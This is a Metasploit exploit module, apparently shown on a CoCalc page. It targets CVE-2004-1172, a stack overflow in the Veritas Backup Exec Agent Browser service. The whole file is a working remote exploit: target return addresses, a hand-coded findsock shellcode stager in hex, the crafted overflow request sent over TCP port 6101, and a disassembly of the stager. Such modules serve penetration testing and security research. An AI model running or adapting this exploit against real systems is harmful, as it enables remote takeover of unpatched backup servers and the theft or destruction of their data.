CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Veritas Backup Exec Name Service Overflow',
14
      'Description'    => %q{
15
          This module exploits a vulnerability in the Veritas Backup
16
        Exec Agent Browser service. This vulnerability occurs when a
17
        recv() call has a length value too long for the	destination
18
        stack buffer. By sending an agent name value of 63 bytes or
19
        more, we can overwrite the return address of the recv
20
        function. Since we only have ~60 bytes of contiguous space
21
        for shellcode, a tiny findsock payload is sent which uses a
22
        hardcoded IAT address for the recv() function. This payload
23
        will then roll the stack back to the beginning of the page,
24
        recv() the real shellcode into it, and jump to it. This
25
        module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
26
        8.6.
27
      },
28
      'Author'         => [ 'hdm' ],
29
      'License'        => MSF_LICENSE,
30
      'References'     =>
31
        [
32
          [ 'CVE', '2004-1172'],
33
          [ 'OSVDB', '12418'],
34
          [ 'BID', '11974'],
35
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
36
        ],
37
      'Privileged'     => true,
38
      'Payload'        =>
39
        {
40
          'Space'    => 1024,
41
          'MinNops'  => 512,
42
          'StackAdjustment' => -3500,
43
        },
44
      'Platform'       => %w{ win },
45
      'Targets'        =>
46
        [
47
          [
48
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
49
            {
50
              'Platform' => 'win',
51
              'Rets'     => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]
52
            },
53
          ],
54
          [
55
            'Veritas BE 8.5',
56
            {
57
              'Platform' => 'win',
58
              'Rets'     => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572
59
            },
60
          ],
61
        ],
62
      'DisclosureDate' => '2004-12-16',
63
      'DefaultTarget' => 0))
64

65
    register_options(
66
      [
67
        Opt::RPORT(6101)
68
      ])
69
  end
70

71
  def exploit
72
    connect
73

74
    print_status("Trying target #{target.name}...")
75

76
    # This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
77
    # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
78
    # nulls: [0x00401150 -> 0x401150FF]
79
    stage_code = "\xfc" * 112
80
    stage_read =
81
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
82
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
83
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
84

85
    # Configure the IAT for the recv call
86
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
87

88
    # Stuff it all into one request
89
    stage_code[2, stage_read.length] = stage_read
90

91
    # Create the registration request
92
    req =
93
      "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
94
      "1.1.1.1.1.1\x00" + "\xeb\x81"
95

96
    print_status("Sending the agent registration request of #{req.length} bytes...")
97
    sock.put(req)
98

99
    print_status("Sending the payload stage down the socket...")
100
    sock.put(payload.encoded)
101

102
    print_status("Waiting for the payload to execute...")
103
    select(nil,nil,nil,2)
104

105
    handler
106
    disconnect
107
  end
108
end
109

110

111
__END__
112
[ findsock stage ]
113
00000000  31F6              xor esi,esi
114
00000002  C1EC0C            shr esp,0xc
115
00000005  C1E40C            shl esp,0xc
116
00000008  89E7              mov edi,esp
117
0000000A  89FB              mov ebx,edi
118
0000000C  6A01              push byte +0x1
119
0000000E  8B7424FE          mov esi,[esp-0x2]
120
00000012  31D2              xor edx,edx
121
00000014  52                push edx
122
00000015  42                inc edx
123
00000016  C1E210            shl edx,0x10
124
00000019  52                push edx
125
0000001A  57                push edi
126
0000001B  56                push esi
127
0000001C  B8FF501140        mov eax,0x401150ff
128
00000021  C1E808            shr eax,0x8
129
00000024  FF10              call near [eax]
130
00000026  85C0              test eax,eax
131
00000028  7907              jns 0x31
132
0000002A  89DC              mov esp,ebx
133
0000002C  4E                dec esi
134
0000002D  85F6              test esi,esi
135
0000002F  75E1              jnz 0x12
136
00000031  FFD7              call edi
137

138